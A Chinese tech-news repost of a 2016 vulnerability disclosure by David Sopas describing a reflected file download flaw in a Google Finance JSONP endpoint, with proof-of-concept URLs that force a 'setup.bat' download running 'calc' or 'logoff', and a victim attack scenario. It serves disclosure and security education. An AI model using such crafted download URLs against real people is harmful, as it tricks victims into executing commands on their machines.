IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

Google财经被曝反射文件下载(RFD)漏洞

发布时间:2016-01-25 16:52文章来源:未知文章作者: IT学习网点击次数:
一位葡萄牙的网络安全专家David Sopas发现了影响Google财经的一个反射文件下载(RFD)漏洞。 我在审计其他客户端的时候发现了这个漏洞,通过RFD,你无需建立页面来强制下载。这个Google JSON文件的请求已经替我们做到了。 发现漏洞 我发现这个请求: http://ww

一位葡萄牙的网络安全专家David Sopas发现了影响Google财经的一个反射文件下载(RFD)漏洞。

我在审计其他客户端的时候发现了这个漏洞,通过RFD,你无需建立页面来强制下载。这个Google JSON文件的请求已经替我们做到了。

发现漏洞

我发现这个请求:

http://www.google.com/finance/info?q=ELI:ALTR&callback=?

会返回如下的信息:

// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]

然后我就好奇,回调参数能不能伪造呢。所以我就在请求时加入了“calc”:

http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

然后返回的信息如下:

//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);

妥了!我把Windows命令注入到XHR请求中了。我们来看看这个URL可不可行:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

然后我就收到了自动弹出批处理文件下载窗口的URL。

我尝试了一下这些浏览器,发现都是可行的:

Firefox最新版本
Opera 最新版本
Internet Explorer 8和9

使用限制

我注意到测试时,大部分的字符都经过过滤,所以你只能用一个命令,不能有空格或者参数。

PoC:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

[批处理执行时会打开计算器]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff

[批处理执行时windows会注销]

攻击场景:

攻击者把URL发给受害者:http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
受害者下载并执行文件
批处理执行后受害者就会被注销出操作系统

视频演示

 

Google认为这个问题不大,没有安全影响,但David Sopas 不那么认为 。目前这个RFD漏洞尚未被修复。

* 参考来源: David Sopas ,vulture翻译,文章有修改,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)


Google财经被曝反射文件下载(RFD)漏洞
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/News/bingdu/160387.html

标签分类:

上一篇:上一篇:Magento的存储型漏洞
下一篇: 下一篇:Magento存在XSS漏洞,在线商城可被攻击者操控
无觅关联推荐,快速提升流量